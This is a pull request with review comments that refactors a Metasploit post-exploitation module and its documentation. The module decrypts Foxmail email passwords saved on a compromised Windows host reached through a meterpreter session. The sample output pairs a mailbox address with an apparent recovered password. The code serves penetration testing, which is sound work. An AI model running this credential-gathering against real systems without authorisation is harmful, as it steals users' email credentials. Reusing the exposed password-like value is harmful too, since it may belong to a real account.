Gather foxmail password #14218

Closed
10 changes: 5 additions & 5 deletions documentation/modules/post/windows/gather/credentials/foxmail.md
@@ -1,7 +1,7 @@
## Verification Steps

1. Download the latest installer of Foxmail.
2. Use foxmail to login email server.
1. Download and install Foxmail package from the official website: https://foxmail.com/win/en.
2. Use FoxMail to log into a mail server.
3. Remember to save the account password.
4. Get a `meterpreter` session on a Windows host.
5. Do: ```run post/windows/gather/credentials/foxmail```
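Review bot: The product name is spelled two ways in the new steps 1 and 2 ("Foxmail" and "FoxMail"); pick one spelling, preferably the "Foxmail" used in the module name and path. Step 3, "Remember to save the account password", also reads ambiguously: it should say that the client's option to remember the password must be enabled, since that is the precondition for the module finding anything. Step 5 wraps an inline command in triple backticks where single backticks are enough.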
Expand All @@ -11,10 +11,10 @@

**ACCOUNT_PATH**

- Specifies the Account directory path for Foxmail
- Specifies the account directory path for Foxmail

## Scenarios

### FoxMail 7.2 on Windows
```
[*] Search account files on C:\Foxmail 7.2\Storage
[+] Parsing configuration file: 'C:\Foxmail 7.2\Storage\kali-team@qq.com\Accounts\Account.rec0', please wait.
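Review bot: The new scenario heading "### FoxMail 7.2 on Windows" does not say which Windows version the module was tested on, and it again uses "FoxMail" where the option text in the same hunk uses "Foxmail". Suggest naming the tested Windows release in the heading and using one spelling of the product name throughout the document.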
Expand All @@ -31,7 +31,7 @@ kali-team@qq.com smtp.qq.com 465 true fjcqkkeqbuwedd

```

* Specify ** **ACCOUNT_PATH**
### FoxMail 7.2 on Windows, with ACCOUNT_PATH specified

```
msf6 post(windows/gather/credentials/foxmail) > set account_path "C:\Foxmail 7.2\Storage\"
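Review bot: The scenario output carried in this hunk's context line shows a mailbox address next to what looks like a recovered password string. If that value came from a real account, replace it with an obvious placeholder before this documentation is merged. On the new heading, the option is written `ACCOUNT_PATH` while the console line sets `account_path`; using the same casing in both places makes the example easier to follow.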
30 changes: 14 additions & 16 deletions modules/post/windows/gather/credentials/foxmail.rb
Expand Up @@ -12,8 +12,9 @@ def initialize(info = {})
info,
'Name' => 'Windows Gather Foxmail Passwords',
'Description' => %q{
This module can decrypt the password of foxmail,
if the user chooses to remember the password.
The module can decrypt the password of the email account saved by Foxmail.
From the Storage\<email>\Accounts\Account.rec0,in the installation directory of Foxmail
The ciphertext is read from the file and decrypted by the dislocation XOR algorithm.
},
'License' => MSF_LICENSE,
'References' => [
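Review bot: The second line of the new Description is a sentence fragment: "From the Storage\<email>\Accounts\Account.rec0,in the installation directory of Foxmail" has no space after the comma and no full stop, and it runs into the next line. Suggest merging the last two lines into one sentence stating that the ciphertext is read from that file under the Foxmail installation directory and then decrypted. "dislocation XOR algorithm" is not a common term, so a short description of what the XOR step actually does would serve readers better.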
Expand All @@ -29,7 +30,7 @@ def initialize(info = {})
)
register_options(
[
OptString.new('ACCOUNT_PATH', [ false, 'Specifies the Account directory path for Foxmail']),
OptString.new('ACCOUNT_PATH', [ false, 'The account directory path to use when grabbing account details from Foxmail']),
]
)
end
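Review bot: The new ACCOUNT_PATH description still does not say which directory is expected. The documentation example sets it to the `Storage` directory, so say so here, and mention that the option is optional and what is used when it is left unset.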
Expand All @@ -49,8 +50,6 @@ def find_string(file, offset, length = 0)
end
end

def pass; end

def enum_session_file(fpath)
account_paths = []
session.fs.dir.foreach(fpath) do |mail_addr|
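Review bot: Removing the empty `pass` method is only safe if every call site goes with it. The one caller visible in this PR is the `else pass` branch dropped in the enum_session_file hunk; please confirm there are no others left in the file. In the context below, `session.fs.dir.foreach(fpath)` is reached with a user-supplied path and no existence check is visible here, so a mistyped ACCOUNT_PATH should be handled with a clear error message rather than an exception.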
Expand All @@ -64,7 +63,7 @@ def enum_session_file(fpath)

# enum session file
account_paths.each do |file_name|
file = read_file(file_name)
file = read_file(file_name) if session.fs.file.exist?(file_name)
if file.nil? || file.empty?
next
end
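Review bot: On the changed `read_file` line, the modifier `if` works only because Ruby leaves `file` as nil when the condition is false, which the following `file.nil?` check then catches. That is easy to misread. An explicit `next unless` guard on the existence check, followed by the plain `read_file` call, states the intent directly. Since the module already uses the post mixin's `read_file`, the mixin's `file?` helper would be more consistent than calling `session.fs.file.exist?` directly.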
Expand All @@ -84,14 +83,13 @@ def enum_session_file(fpath)
while index < file.length
if (file[index] && file[index] > "\x20" && file[index] < "\x7f" && file[index] != "\x3d")
Contributor


Again if \x20, aka space, is a valid character, then this should be >=.

Contributor


Need some clarification here: what is the expected range of characters you are looking at here? If this is in the format of asdf123=asdf23423 then I would expect only alphanumeric characters to be included in this range, but I see you're also including characters such as <, !, @ and other characters here that seem a little odd given that you specifically try not to match on =. Just would like to double check this logic as it seems somewhat odd to me.

buffer += file[index]
if ['Email', 'IncomingServer', 'OutgoingServer', 'Password'].include?(buffer)
email_info[buffer] = find_string(file, index + offset) || nil
elsif ['IncomingPort', 'OutgoingPort'].include?(buffer)
email_info[buffer] = find_string(file, index + 5, 2) || nil
elsif ['InComingSSL', 'OutgoingSSL'].include?(buffer)
email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
else
pass
case buffer
when 'Email', 'IncomingServer', 'OutgoingServer', 'Password'
email_info[buffer] = find_string(file, index + offset) || nil
when 'IncomingPort', 'OutgoingPort'
email_info[buffer] = find_string(file, index + 5, 2) || nil
when 'InComingSSL', 'OutgoingSSL'
email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
gwillcox-r7 marked this conversation as resolved.
end
else
buffer = ''
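Review bot: In the new `when 'InComingSSL', 'OutgoingSSL'` branch, `find_string(file, index + 5, 2) == 1 || false` carries a redundant `|| false`, because `==` already returns true or false. The `|| nil` on the other two branches only matters if `find_string` can return false. More importantly, the comparison with the Integer `1` is true only if `find_string` returns an Integer for the two-byte read. Please confirm its return type, since a String result would make both SSL fields always false. The key spelling 'InComingSSL' differs from 'IncomingPort'; if that matches the on-disk key, a short comment saying so would prevent a well-meaning "fix" later.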
Expand Down Expand Up @@ -158,7 +156,7 @@ def foxmail_crypto(version, ciphertext)
end

def run
print_status("Gather Foxmail Passwords on #{sysinfo['Computer']}")
print_status("Gathering Foxmail passwords on #{sysinfo['Computer']}")
# get session file path
foxmail_path = ''
if datastore['ACCOUNT_PATH'].to_s.empty?
Expand All @@ -168,7 +166,7 @@ def run
else
foxmail_path = expand_path(datastore['ACCOUNT_PATH'])
end
if foxmail_path
if !foxmail_path.to_s.empty?
result = enum_session_file(foxmail_path)
columns = [
'Email',
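Review bot: The new condition `if !foxmail_path.to_s.empty?` is a negated test wrapping the rest of `run`, and no branch is visible in this hunk for the case where no path was found. A guard clause at the top (print an error and return when the path is empty) would remove the nesting and tell the operator why nothing was gathered. It would also be the natural place to check that the directory exists on the target before calling `enum_session_file`.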